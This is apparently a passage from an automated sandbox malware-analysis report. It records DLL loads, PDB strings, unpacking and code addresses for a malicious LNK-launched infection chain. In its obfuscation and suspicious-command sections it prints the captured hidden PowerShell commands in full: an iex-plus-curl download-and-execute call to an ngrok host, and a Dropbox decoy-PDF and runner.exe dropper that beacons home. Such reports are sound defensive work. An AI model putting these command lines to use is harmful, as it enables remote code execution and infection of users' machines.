                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ieframe.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: k7rn7l32.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: ntd3ll.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: 751ietQPnX.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2278426840.000002336DB4B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000010.00000002.2282838688.0000023B6EE9A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: 854113748.exe, 0000001D.00000003.2340149595.0000000000F20000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340267249.0000000002E50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345418878.0000000005710000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345179644.00000000039C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb= source: powershell.exe, 00000010.00000002.2278426840.000002336DB5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: 854113748.exe, 0000001D.00000003.2339382233.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339181691.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.2277453926.000002336DB34000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: 854113748.exe, 0000001D.00000003.2339895618.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339702134.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344912074.0000000005830000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344721421.0000000005690000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb`Il source: 854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp
                      Source: Binary string: ntdll.pdbUGP source: 854113748.exe, 0000001D.00000003.2339382233.0000000002FC0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339181691.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: 854113748.exe, 0000001D.00000003.2339895618.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2339702134.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344912074.0000000005830000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2344721421.0000000005690000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: b.pdb source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: 854113748.exe, 0000001D.00000003.2340786736.0000000002FF0000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340562486.0000000002DD0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2349410799.0000000005690000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2350549832.00000000058B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: 854113748.exe, 0000001D.00000003.2340149595.0000000000F20000.00000004.00000001.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000003.2340267249.0000000002E50000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345418878.0000000005710000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 0000001E.00000003.2345179644.00000000039C0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdbSv"P source: powershell.exe, 00000010.00000002.2283522545.0000023B6EF5E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb source: 854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmp

                      Data Obfuscation

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeUnpacked PE file: 26.2.854113748.exe.2220000.2.unpack
                      PowerShell case anomaly found
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)Jump to behavior
                      Suspicious powershell command line found
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias 893fac curl ; sal a8dd58 iEx ; a8dd58(893fac -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/3280fc306b2b1b17d755c31452bd62f7 -UseBasicParsing)Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE; IWR -Uri 'https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/metadata/3280fc306b2b1b17d755c31452bd62f7'; "
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_004150A0 GetModuleHandleW,LoadLibraryW,GetProcAddress,26_2_004150A0
                      Source: 854113748.exe.16.drStatic PE information: real checksum: 0xf661c should be: 0x1c6367
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7F42C0 pushad ; ret 2_2_00007FFD9B7F42FD
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7F00AD pushad ; iretd 2_2_00007FFD9B7F00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E7C2E pushad ; retf 16_2_00007FFD9B7E7C5D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E842E pushad ; ret 16_2_00007FFD9B7E845D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E00AD pushad ; iretd 16_2_00007FFD9B7E00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E7C5E push eax; retf 16_2_00007FFD9B7E7C6D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E845E push eax; ret 16_2_00007FFD9B7E846D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E7CB3 pushad ; retf 16_2_00007FFD9B7E7C5D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B7E7CC3 push eax; retf 16_2_00007FFD9B7E7C6D
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B8B34A4 pushfd ; ret 16_2_00007FFD9B8B34A5
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_0050E58E push ecx; ret 26_2_0050E5A1
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 26_2_00473991 push ecx; ret 26_2_004739A4
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060B8EC push edi; ret 29_3_0060B8F8
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060A0F9 push FFFFFF82h; iretd 29_3_0060A0FB
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_00608904 push ecx; ret 29_3_00608917
                      Source: C:\Users\user\AppData\Local\Temp\854113748.exeCode function: 29_3_0060B1DC push eax; ret 29_3_0060B1DD
